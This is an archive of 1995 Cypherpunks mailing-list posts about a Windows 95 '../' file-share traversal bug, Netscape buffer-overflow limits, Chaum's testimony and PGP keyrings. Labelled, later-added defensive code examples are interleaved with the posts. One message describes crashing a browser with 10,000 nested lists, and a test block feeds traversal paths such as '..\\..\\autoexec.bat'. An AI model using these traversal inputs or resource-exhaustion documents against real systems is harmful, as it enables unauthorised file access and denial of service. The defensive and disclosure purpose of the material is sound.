>uncovering a hole in the encryption algorithms of M$ products.
>
>Clearly, YMMV.
>
>-Futplex <futplex@pseudonym.com>

If it means protection only when using a proprietary product 
owned by Microsoft then no, I still don't see it as much of a 
reward.  If we are talking a system which can be used by 
everyone at no cost, then yes that would be motivating.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry_Ellig@jec.senate.gov
Date: Wed, 4 Oct 95 12:27:30 PDT
To: cypherpunks@toad.com
Subject: David Chaum testimony
Message-ID: <9509048128.AA812845568@smtpgwys.senate.gov>
MIME-Version: 1.0
Content-Type: text/plain


     I'm a professor from George Mason University on leave to do some work 
     with the Joint Economic Committee on the economy of the 21st century.  
     I found your e-mail address attached to some congressional testimony 
     by David Chaum.  Does anyone know when he testified, and before what 
     committee?  Being new on Capitol Hill, I haven't yet found the easy 
     way to find this out from inside the government!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 4 Oct 95 12:45:29 PDT
To: bsdc@ai.mit.edu
Subject: CSPAN2: Copyright on the Internet
Message-ID: <v02120d0bac9894397b65@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


It's 3:43 pm EST, and CSPAN-2 has Cerf, the CO$ counsel, and others on a
panel about copyright on the internet...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@gateway.com>
Date: Wed, 4 Oct 95 13:12:10 PDT
To: cypherpunks@toad.com
Subject: Digest [full] version available
Message-ID: <Pine.LNX.3.91.951004155756.2546B-100000@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


I have set up an un-moderated digest of the Cypherpunks mailing list and it
is now available for everyone..

My main goal on Cypherpunks is to lurk and the digest version lets me do
that without being forced to read each one as it comes in.. [or filter 
the posts into a mailbox that I have a bad tendency to leave for long 
periods of time...]

Digests will be created every 40K bytes.

subscribe by sending e-mail to majordomo@gateway.com with a BODY line:

		subscribe cypherpunks-d

Enjoy..
-abc

      It's time to stand and cry             |  Alan B Clegg
       That Freedom will not live             |  President
         Beyond our willingness to die         |  Gateway Communications
          -Lester Bork                          |  http://www.gateway.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 4 Oct 95 16:18:20 PDT
To: sameer@c2.org
Subject: Re: New Netscape bug (in version 1.12)
Message-ID: <199510042316.QAA22055@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Oct 4, 11:00am, sameer wrote:
> Subject: Re: New Netscape bug (in version 1.12)
> 	Isn't there a resolver #define or something in limits.h called
> MAXHOSTNAMELEN ? Something like that? (Perhaps not, but that's what I
> recall..)

  We are using MAXHOSTNAMELEN if it exists, both in 2.0, and in the
security patch that we shipped.  If it doesn't exist we just assume 64.
As a quick sample, on sunos and irix it is 64, and on solaris it is 256.
On sunos and irix it is defined in sys/param.h, and on solaris it is
defined in netdb.h.  I wasn't able to find any mention of it or any
other limits on the host names passed in to gethostbyname() in the
man pages on any of these systems.

	--Jeff


Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Wed, 4 Oct 95 13:20:55 PDT
To: sameer@c2.org (sameer)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510041800.LAA07074@infinity.c2.org>
Message-ID: <199510042020.QAA01358@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed Oct  4 14:00:26 1995: you scribbled...
>
> > How do I decide what is too long?  For example, when tracking down buffer
> > overflow problems for the security patch, we found an undocumented
> > static buffer limit of 64 bytes for the hostname passed to gethostbyname()
> > on IRIX.  Before we stumbled across this problem, we had a discussion
> > about what length we should truncate host names to.  People thought
> > that 128 characters was a reasonable limit, but it turned out that it
> > was too long.
>
>
> 	Isn't there a resolver #define or something in limits.h called
> MAXHOSTNAMELEN ? Something like that? (Perhaps not, but that's what I
> recall..)

The DNS RFC specifies that the max hostname should be 255 characters, with
a 63 character limit for each segment of the name (RFC1035, section
2.3.4.)

- --> 2.3.4. Size limits
- -->
- --> Various objects and parameters in the DNS have size limits.  They are
- --> listed below.  Some could be easily changed, others are more
- --> fundamental.
- -->
- --> labels          63 octets or less
- -->
- --> names           255 octets or less

But, some older systems (SunOS4, and IRIX, amongst others) have the
MAXHOSTNAMELEN defined as 64 characters, so this limits the max name to 64.
Solaris2 has MAXHOSTNAMELEN defined to 255 characters.
(the define is in sys/param.h for sunos and solaris).  

just a point of interest...

...alex...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Alex Tang <altitude@umich.edu> or Alex Tang <altitude@cic.net>

iQCVAwUBMHLsMaNd+TOtm9v5AQGbGQQAiFMaOyaLQlJgO+47dkw4H4O4FP8dJooR
lkFmooBTFr/BWaZ7Zl9KFwCSwm/COH5ZfQpf6zo0pWlvGYDVAYPomaV90Z1zg+dk
0jNhidLwCrxlNOKa+MyqBJiUpfyq76OW46A9V1VDa5OH8g8bbv8zn//GJCGlF+6K
3s+zjFkR4tM=
=0I/O
-----END PGP SIGNATURE-----
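
[Added example, not part of either message above and not Netscape's code: a length check placed in front of gethostbyname(), combining the MAXHOSTNAMELEN fallback of 64 that Jeff Weinstein describes with the RFC 1035 limits Alex Tang quotes. The names check_hostname, resolve_checked and C16, the letters-digits-hyphen character rule, and the choice to leave one byte for the terminating NUL are assumptions of this example.]

```c
#include <stddef.h>
#include <stdio.h>
#include <netdb.h>      /* gethostbyname(); Solaris defines MAXHOSTNAMELEN here */
#include <sys/param.h>  /* SunOS and IRIX define MAXHOSTNAMELEN here */

#ifndef MAXHOSTNAMELEN
#define MAXHOSTNAMELEN 64   /* fallback when the platform gives no value */
#endif

#define DNS_MAX_LABEL 63    /* RFC 1035 2.3.4: labels 63 octets or less */
#define DNS_MAX_NAME  255   /* RFC 1035 2.3.4: names 255 octets or less (wire form) */
#define DNS_MAX_TEXT  253   /* longest dotted text form that fits in 255 wire octets */
#define C16 "0123456789abcdef"  /* constructed 16-character filler for sample names */

enum host_check {
    HOST_OK, HOST_EMPTY, HOST_TOO_LONG,
    HOST_LABEL_TOO_LONG, HOST_EMPTY_LABEL, HOST_BAD_CHAR
};

/* Letters, digits and hyphen only (assumption: classic host name syntax). */
static int is_ldh(unsigned char c)
{
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9') || c == '-';
}

/*
 * Validate an untrusted host name against the smaller of the platform's
 * buffer limit and the DNS limits.  The name must be strictly shorter than
 * the platform limit so the terminating NUL also fits in a buffer that size.
 */
enum host_check check_hostname(const char *name, size_t platform_limit)
{
    size_t bound = platform_limit < DNS_MAX_NAME ? platform_limit : DNS_MAX_NAME;
    size_t len = 0, label = 0, i;

    if (name == NULL || name[0] == '\0')
        return HOST_EMPTY;

    /* Bounded scan: never walk further than the limit into hostile input. */
    while (len < bound && name[len] != '\0')
        len++;
    if (len == bound)
        return HOST_TOO_LONG;

    /* One trailing dot (fully qualified form) does not count as text. */
    if (len - (name[len - 1] == '.') > DNS_MAX_TEXT)
        return HOST_TOO_LONG;

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '.') {
            if (label == 0)
                return HOST_EMPTY_LABEL;    /* ".com" or "a..b" */
            label = 0;
        } else if (!is_ldh(c)) {
            return HOST_BAD_CHAR;
        } else if (++label > DNS_MAX_LABEL) {
            return HOST_LABEL_TOO_LONG;
        }
    }
    return HOST_OK;
}

/* Refuse to hand the resolver anything the platform limit cannot hold. */
struct hostent *resolve_checked(const char *name)
{
    if (check_hostname(name, MAXHOSTNAMELEN) != HOST_OK)
        return NULL;
    return gethostbyname(name);
}

int main(void)
{
    /* Constructed sample names; none is looked up on the network. */
    const char *samples[] = {
        "home.netscape.com",
        C16 C16 C16 "." C16 C16 C16,    /* 97 characters, two 48-char labels */
        C16 C16 C16 C16 ".example",     /* 64-character first label */
        "a..example",
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("sample %zu: limit 64 -> %d, limit 128 -> %d, limit 255 -> %d\n",
               i, (int)check_hostname(samples[i], 64),
               (int)check_hostname(samples[i], 128),
               (int)check_hostname(samples[i], 255));
    return 0;
}
```

The second sample passes a 128-byte limit but is refused at 64, which is the gap between the limit people thought reasonable and the undocumented one found on IRIX.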



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Reich <Richard_Reich@reich.com>
Date: Wed, 4 Oct 95 16:46:49 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: CSPAN2: Copyright on the Internet
In-Reply-To: <v02120d0bac9894397b65@[199.0.65.105]>
Message-ID: <199510042345.QAA00540@lux.reich.com>
MIME-Version: 1.0
Content-Type: text/plain


From tonight's C-SPAN (not 2) overnight schedule:

2:45 am ET/11:45 pm PT

Cyber Law Institute, Georgetown University Law Center: "The Internet and 
Property Rights: What's Mine is
Yours" 

Speaking: Wayne Rush, Communication Week; Vint Cerf, MCI; Bill Burrington, 
AOL; Peter Pitsch-Progress
and Freedom Foundation; Others 


These are sometimes wildly inaccurate, so don't blame me.

-r
-- 
Richard Reich / Internet Consulting / +1 415 668 3311
... and that things are not so ill with you and me as they might
have been, is half owing to the number who lived faithfully a hidden
life, and rest in unvisited tombs.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Reich <Richard_Reich@reich.com>
Date: Wed, 4 Oct 95 16:48:37 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: CSPAN2: Copyright on the Internet
In-Reply-To: <v02120d0bac9894397b65@[199.0.65.105]>
Message-ID: <199510042348.QAA00554@lux.reich.com>
MIME-Version: 1.0
Content-Type: text/plain


Ooops.  This is from the C-SPAN2 schedule (which I don't bother with because 
it turns into, no kidding, The Playboy Channel at 5pm every day <g>):

8:35 pm ET/5:35 pm PT

Cyber Law Institute, Georgetown University Law Center: "The Internet and 
Property Rights: What's Mine is
Yours" 

Speaking: Wayne Rush, Communication Week; Vint Cerf, MCI; Bill Burrington, 
AOL; Peter Pitsch-Progress
and Freedom Foundation; Others 


-- 
Richard Reich / Internet Consulting / +1 415 668 3311
... and that things are not so ill with you and me as they might
have been, is half owing to the number who lived faithfully a hidden
life, and rest in unvisited tombs.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@Networking.Stanford.EDU>
Date: Wed, 4 Oct 1995 16:57:57 -0700 (PDT)
To: "Henry Sanders (Exchange)" <henrysa@microsoft.com>
Subject: Re: Serious Windows TCP/IP Security Hole
In-Reply-To: <c=US%a=_%p=Microsoft%l=BENJI951004101104NS00DC0D@CHOPPER>
Message-ID: <Pine.ULT.3.91.951004165333.19409K-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'm forwarding you a couple messages. I haven't run SAMBA myself, but 
people who have have been able to read files on my machine that aren't 
supposed to be shared.

-rich

On Wed, 4 Oct 1995, Henry Sanders (Exchange) wrote:

> Hi, I've jumped in late on this thread. What is the bug referred to in the note below? I might be able to give you current status on it.
> 
> Thanks,
> Henry Sanders
> henrysa@microsoft.com
> 
> >In article <44amc4$ft6@nntp.Stanford.EDU>, llurch@networking.stanford.edu
> says...
> >>
> >>FYI for those of you still running WFW. Could anybody confirm or deny
> >>that Microsoft has patched this hole in the shipping version of 95?
> >>As with most such serious "oopsies," Microsoft has not made any
> >>information on this issue available in their Knowledge Base.
> >
> >Nope, it is still there.
> 
> Can you demonstrate that this is true? I'll give you an account on my box.
> I've received several notes and flames that the problem either never
> existed (which I know is untrue) or was fixed at a specified (often
> specified different) patch level.
> 
> I should really try this myself, but I don't have time, and the only UNIX
> box I can really mess with is my Linux box, which is also my Win95 box.
> 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@Networking.Stanford.EDU>
Date: Wed, 4 Oct 1995 16:58:40 -0700 (PDT)
To: henrysa@microsoft.com
Subject: Re: Serious Windows TCP/IP Security Hole (fwd)
Message-ID: <Pine.ULT.3.91.951004165820.19409L-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Sat, 30 Sep 1995 02:01:56 -0700 (PDT)
From: Rich Graves <llurch@Networking.Stanford.EDU>
To: Ken Simler <krs2@cornell.edu>
Subject: Re: Serious Windows TCP/IP Security Hole (fwd)

I don't really know, I'm just passing on news... maybe talk to these folks.

-rich

---------- Forwarded message ----------
Date: Thu, 28 Sep 95 19:56:38 PDT
From: Tom Czarnik <czarnik@netmanage.com>
To: Rich Graves <llurch@Networking.Stanford.EDU>
Subject: Re: Serious Windows TCP/IP Security Hole 


On Thu, 28 Sep 1995 18:31:07 -0800  Rich Graves 
>Can you demonstrate that this is true? I'll give you an account on
>my box. I've received several notes and flames that the problem 
>either never existed (which I know is untrue) or was fixed at a 
>specified (often specified different) patch level.

We can do it your way or if you are physically located at Stanford,
you can schedule an appointment to come by NetManage. We are located
in Cupertino, right off 280 at DeAnza Blvd.

The choice is yours.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@Networking.Stanford.EDU>
Date: Wed, 4 Oct 1995 16:59:03 -0700 (PDT)
To: henrysa@microsoft.com
Subject: Re: Serious Windows TCP/IP Security Hole (fwd)
Message-ID: <Pine.ULT.3.91.951004165855.19409M-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Sat, 30 Sep 1995 02:03:58 -0700 (PDT)
From: Rich Graves <llurch@Networking.Stanford.EDU>
To: Ken Simler <krs2@cornell.edu>
Subject: Re: Serious Windows TCP/IP Security Hole (fwd)

This doesn't work for you? Please get back to me if you figure it out. 
I'd like to document the problem accurately.

-rich

---------- Forwarded message ----------
Date: Thu, 28 Sep 95 23:45:49 -0400
From: Mark Thornton <markt@eng.umd.edu>
To: llurch@networking.stanford.edu
Newgroups: comp.os.ms-windows.win95.misc,
    comp.os.ms-windows.networking.windows,
    comp.os.ms-windows.networking.tcp-ip
Subject: Re: Serious Windows TCP/IP Security Hole

I can confirm that the complete (floppy) version of Windows 95 
STILL has the ../ bug ;-( The ... bug has been fixed, correctly 
returning the following message
chkpath: ERRDOS - ERRbadpath (Directory invalid.)
But cd ../ WILL put you in the root directory of the share
with the rights you had in the initial directory. Very bad...
I've had to share all my drives read-only until the problem 
gets fixed.
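
[Added example, not part of the original message and not Microsoft's or Samba's code: a lexical containment check a file-sharing server can apply to client-supplied paths, so that "../" never climbs above the shared directory and dot-only components such as "..." are refused. The names share_resolve and share_checked, the MAX_DEPTH limit and the sample paths are constructed for this example.]

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_DEPTH 32    /* assumption: deepest directory nesting accepted */

struct comp { const char *p; size_t n; };   /* one path component, not NUL-terminated */

/* Return 1 if the n bytes at s are all '.' characters. */
static int all_dots(const char *s, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (s[i] != '.')
            return 0;
    return 1;
}

/* Apply each component of path to the stack; -1 means the path is refused. */
static int walk(struct comp *st, size_t *depth, const char *path)
{
    const char *p = path;

    while (*p != '\0') {
        size_t n = strcspn(p, "/\\");       /* accept both separators */
        if (n == 0) {                       /* empty component: skip separator */
            p++;
            continue;
        }
        if (all_dots(p, n)) {
            if (n == 2) {
                if (*depth == 0)
                    return -1;              /* ".." would leave the share */
                (*depth)--;
            } else if (n > 2) {
                return -1;                  /* "..." and longer: refuse outright */
            }                               /* "." is a no-op */
        } else {
            if (*depth == MAX_DEPTH)
                return -1;
            st[*depth].p = p;
            st[*depth].n = n;
            (*depth)++;
        }
        p += n;
    }
    return 0;
}

/*
 * Resolve request against cwd, both relative to the share root ("" is the
 * root).  A leading separator means the share root, never the host's root.
 * On success writes the normalized path to out and returns 0; returns -1 if
 * the request escapes the share or does not fit.  out must not overlap the
 * inputs.
 */
int share_resolve(const char *cwd, const char *request, char *out, size_t outlen)
{
    struct comp st[MAX_DEPTH];
    size_t depth = 0, used = 0, i;

    if (cwd == NULL || request == NULL || out == NULL || outlen == 0)
        return -1;
    if (request[0] != '/' && request[0] != '\\') {
        if (walk(st, &depth, cwd) != 0)
            return -1;
    }
    if (walk(st, &depth, request) != 0)
        return -1;

    for (i = 0; i < depth; i++) {
        size_t need = st[i].n + (i > 0 ? 1 : 0);
        if (used + need >= outlen)          /* keep room for the NUL */
            return -1;
        if (i > 0)
            out[used++] = '/';
        memcpy(out + used, st[i].p, st[i].n);
        used += st[i].n;
    }
    out[used] = '\0';
    return 0;
}

/* Convenience wrapper: normalized path in a static buffer, or NULL if refused. */
const char *share_checked(const char *cwd, const char *request)
{
    static char buf[256];
    return share_resolve(cwd, request, buf, sizeof buf) == 0 ? buf : NULL;
}

int main(void)
{
    /* Constructed requests: {current directory, client-supplied path}. */
    const char *req[][2] = {
        { "docs/public", "../readme.txt" }, { "", "../" },
        { "docs", "..." }, { "docs", "..\\..\\autoexec.bat" },
    };
    size_t i;

    for (i = 0; i < sizeof req / sizeof req[0]; i++) {
        const char *r = share_checked(req[i][0], req[i][1]);
        printf("[%s] + [%s] -> %s\n", req[i][0], req[i][1], r ? r : "REFUSED");
    }
    return 0;
}
```

The check is purely lexical, so it has to run before the path reaches the file system and does not account for links or other aliases that the file system itself resolves.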




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 4 Oct 95 14:12:47 PDT
To: cypherpunks@toad.com
Subject: Re: David Chaum testimony
Message-ID: <199510042110.RAA28372@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9509048128.AA812845568@smtpgwys.senate.gov>,
Jerry_Ellig@jec.senate.gov wrote:

>      I'm a professor from George Mason University on leave to do some work 
>      with the Joint Economic Committee on the economy of the 21st century.  
>      I found your e-mail address attached to some congressional testimony 
>      by David Chaum.  Does anyone know when he testified, and before what 
>      committee?  Being new on Capitol Hill, I haven't yet found the easy 
>      way to find this out from inside the government!

The full text of the testimony is available at

http://www.digicash.com/publish/testimony.html
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHL4SSoZzwIn1bdtAQEjdAGAhUoSwRu803hFI8ARmqsmbASy1CNNK7Cj
rl5Tw5mMVGoZcPwhsyO5Af02z6lhIfyw
=L1hB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif )
Date: Wed, 4 Oct 95 09:39:25 PDT
To: cypherpunks@toad.com
Subject: [Fwd] Security Threat to Internet shopping (DT)
Message-ID: <9510041637.AA27588@PrakInf.TU-Ilmenau.DE>
MIME-Version: 1.0
Content-Type: text/plain


>Security threat to Internet shopping
>
>Daily Telegraph (paper edition), 3 October 1995, p. 12
>
>[...]
>However, users of Microsoft's Windows 95 have found that it ignores the
>security passwords on private electronic mail  sent or received using
>software other than Windows 95.

Never heard of this before, but it seems that MS assumes there's no mail
like windows'95 mail? 

If all use it, you have no holes any longer.

You or your partners don't use Windows'95? That's your problem not ours!


read you later  -  Holger Reif
http://remus.prakinf.tu-ilmenau.de/Reif/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 4 Oct 95 17:40:11 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <44td0c$3um@tera.mcom.com>
Message-ID: <199510042139.RAA26832@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein wrote:
> >   That's true, but it is also true that Netscape should also be
> > performing some sanity checking on input rather than relying on 
> > the supporting libraries to be secure. Remember, a hole is a hole.
> > The last sendmail bug was a buffer overflow in syslog, however,
> > sendmail still got patched to do bounds checking on the strings
> > it was passing to syslog. 
> > 
> >   It looks like this is only bug on BSDI2.0/XAccel, and NT3.5/NS1.1. But
> > is it wise for netscape to be sending 10,000 character strings to GUI
> > functions anyway? 
> 
>   While I agree that we should probably truncate this string to something
> smaller than 10000 characters(I've already filed a bug on it here), it
> is perfectly legal X protocol to send 10,000 characters to the X server.
> How do I decide what is too long?  For example, when tracking down buffer
> overflow problems for the security patch, we found an undocumented
> static buffer limit of 64 bytes for the hostname passed to gethostbyname()
[lots deleted]

  I agree with a lot of what you say Jeff. What I would do is set the string
limits to be whatever the specs allow. For instance, in the case of
domain names, the limit is supposed to be 256. In a mailto: just what
is the limit of an RFC822 valid e-mail address? 

  I will say that Netscape is a very robust program. I have created documents
with 10,000 nested <UL> lists, and the program didn't dump. I have
created forms with 10,000 selection widgets with overlong labels and variable
names and it handled them (didn't display them very well) However, I am
a little weary of netscape allowing lists and forms having 10,000
levels. For one thing, although the 10,000 nested lists didn't crash
netscape, they did use up all the swap space on my computer except for
300k. A 10K byte document was able to exhaust 32megs of ram.

  When I combined supernested lists, with overlong FORM variable names,
and an extra long title, I did get a few sporadic coredumps. Some people
may have a religious position on browsers limiting SGML/HTML nested
structures (because they feel the browser should be able to handle any
"legal" document), but I for one am more pragmatic. 

  I hope you don't take my criticisms as an attack on your programmers.
Netscape is my all around favorite application. I just want to see it
improved and safer.

-Ray
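
An added example (not part of the original message, and not Netscape code) of the pragmatic position argued above: a checker that stops reading a document as soon as list nesting, the title, or a form variable name crosses a fixed limit. The limit values and all names here are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Illustrative limits chosen for this example; they are assumptions, not
# values taken from Netscape or from any HTML specification.
MAX_LIST_DEPTH = 64
MAX_TITLE_CHARS = 256
MAX_FIELD_NAME_CHARS = 256


class LimitExceeded(Exception):
    """Raised as soon as the document crosses one of the limits."""


class BoundedHTMLChecker(HTMLParser):
    LIST_TAGS = {"ul", "ol", "dl", "menu", "dir"}
    FIELD_TAGS = {"input", "select", "textarea"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.depth = 0          # current list nesting level
        self.deepest = 0        # deepest level seen so far
        self.in_title = False
        self.title_chars = 0

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag in self.LIST_TAGS:
            self.depth += 1
            self.deepest = max(self.deepest, self.depth)
            if self.depth > MAX_LIST_DEPTH:
                raise LimitExceeded(
                    "list nesting deeper than %d" % MAX_LIST_DEPTH)
        elif tag in self.FIELD_TAGS:
            for key, value in attrs:
                if key == "name" and value and len(value) > MAX_FIELD_NAME_CHARS:
                    raise LimitExceeded(
                        "form variable name longer than %d" % MAX_FIELD_NAME_CHARS)
        elif tag == "title":
            self.in_title = True

    def handle_endtag(self, tag):
        if tag in self.LIST_TAGS:
            self.depth = max(0, self.depth - 1)
        elif tag == "title":
            self.in_title = False

    def handle_data(self, data):
        # Title text may arrive in several pieces, so keep a running total.
        if self.in_title:
            self.title_chars += len(data)
            if self.title_chars > MAX_TITLE_CHARS:
                raise LimitExceeded("title longer than %d" % MAX_TITLE_CHARS)


def check_document(html):
    """Return (accepted, detail). Parsing stops at the first exceeded limit."""
    checker = BoundedHTMLChecker()
    try:
        checker.feed(html)
        checker.close()
    except LimitExceeded as exc:
        return False, str(exc)
    return True, "deepest list nesting %d" % checker.deepest


# Constructed sample documents.
DEEP_LISTS = "<UL>" * 10000 + "<LI>x" + "</UL>" * 10000
ORDINARY = "<title>ok</title>" + "<ul><li>" * 10 + "x" + "</ul>" * 10
LONG_NAME = '<form><select name="' + "v" * 5000 + '"></select></form>'
LONG_TITLE = "<title>" + "A" * 5000 + "</title>"

if __name__ == "__main__":
    for label, doc in [("deep lists", DEEP_LISTS), ("ordinary", ORDINARY),
                       ("long name", LONG_NAME), ("long title", LONG_TITLE)]:
        print(label, check_document(doc))
```

The deep-list document is rejected at the 65th open list rather than after all 10,000 have been processed, so the cost of rejecting it is bounded by the limit and not by the size of the input.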
 

 


    



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 4 Oct 95 15:09:14 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: David Chaum testimony
In-Reply-To: <9509048128.AA812845568@smtpgwys.senate.gov>
Message-ID: <199510042211.SAA22395@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jerry Ellig writes:
>      I found your e-mail address attached to some congressional testimony 
>      by David Chaum.  Does anyone know when he testified, and before what 
>      committee?  Being new on Capitol Hill, I haven't yet found the easy 
>      way to find this out from inside the government!

According to http://www.digicash.com/publish/testimony.html, he testified
on July 25, 1995 before the Subcommittee on Domestic and International 
Monetary Policy of the House Committee on Banking and Financial Services.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@robo.remailer
Date: Wed, 4 Oct 95 18:16:31 PDT
To: cypherpunks@toad.com
Subject: SAIC Bags Tier 1 Job
Message-ID: <199510050111.SAA09834@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


SAIC Awarded Multimillion Dollar Communications Security
Contract


San Diego, Oct. 3 /PRNewswire/ -- Science Applications
International Corp. (SAIC) said it has been awarded a
three year, $28 million contract to support the Space and
Naval Warfare Systems Command (SPAWAR).

The Common Tier 1 System will integrate computers and
software to implement and field the Tier 1 element of the
Department of Defense's Electronic Key Management System.

This program will provide automated communications
security and key management system support for the Navy,
Army, Air Force, Marines, Coast Guard and other
government agencies.

Common Tier 1 will help implement the Electronic Key
Management System and support its integration with COMSEC
material management in the Navy, Army, Air Force and
joint key management systems.

The work performed on this contract will be split between
San Diego (66%) and Camden, New Jersey (34%), and is
expected to be completed in October 1998.

"We expect to hire an additional 65 employees in San
Diego during this contract to primarily work on software
development," said SAIC Program Manager Tom Trebelhorn.

"This is a very significant win that allows SAIC to
continue its involvement in this key information security
program and extend the company's commitment to the
communication security field," Trebelhorn added.

SAIC provides high-technology services and products for
government and private industry in the areas of space,
transportation, national security, environment, health
care, energy and systems integration.  With nearly $2
billion in annual revenues, the employee-owned, San Diego
based company has 20,000 employees in more than 350
locations worldwide.

Contact:  Tom Trebelhorn, Operations Manager of SAIC,
619-552-5319, or fax, 619-452-3540, or e-mail,
tom_trebelhorn@cpqm.saic.com/












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simeon ben Nevel <snevel@schwab.com>
Date: Wed, 4 Oct 95 15:19:25 PDT
To: karlsiil@attmail.com>
Subject: Re: New Windoze PGP Shell (freeware) worth checking out
In-Reply-To: <winATT-2.7-karlsiil-1616>
Message-ID: <Pine.SUN.3.91.951004181435.2377D-100000@w0140dev>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Oct 1995, Karl A Siil wrote:

> OK, I'll bite. Where do I get it? Where did you get your info? Do you have a 
> copy?

> From: internet!powergrid.electriciti.com!adam (Adam Philipp)
> Subject: New Windoze PGP Shell (freeware)  worth checking out

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> AEgis Research (who I know nothing about) has come out with a very pleasant
> windows front end for PGP. It is bone-head compliant, and even works well in
> Win95. I'm only plugging because I was so impressed. Until Eudora has PGP
> hooks, this is my shell of choice.


I saw it on alt.security.pgp

it's at <http://iquest.com/~aegisrc>

It is pretty nice

The url to download isn't on the home-page though, but it's only one 
level down... just snoop about a bit.

simeon


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
snevel@schwab.com 
#include std.disclaimer
I speak for myself and no one else





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Wed, 4 Oct 95 15:48:58 PDT
To: cypherpunks@toad.com
Subject: Re: Keyserver keyrings
Message-ID: <LBygcD2w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


syrinx@c2.org (Syrinx Anonymous Remailer) writes:

> According to 'Derek Atkins':
>  
> > The name pgp.mit.edu is now
> > pointing at another machine (which I do not maintain).  For access to
> > the keyring, send email to pgp-public-keys@pgp.mit.edu -- that is the
> > supported method of access.
> 
> does anybody out there maintain a current keyring that can be grabbed
> via anon ftp instead? It seems like a waste of time for hundreds of
> users to continually add updates to their own keyrings when the whole
> keyserver ring can be picked up at one time, updates and all? ftp is
> much more convenient than stringing together multiple sections received
> by e-mail.

That's what I did with WS_FTP until they stopped updating it on August 24th.

[Pgpkeys]
HOST=ftp.informatik.uni-hamburg.de
UID=anonymous
LOCDIR=c:\pgp
DIR=/pub/virus/crypt/pgp

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
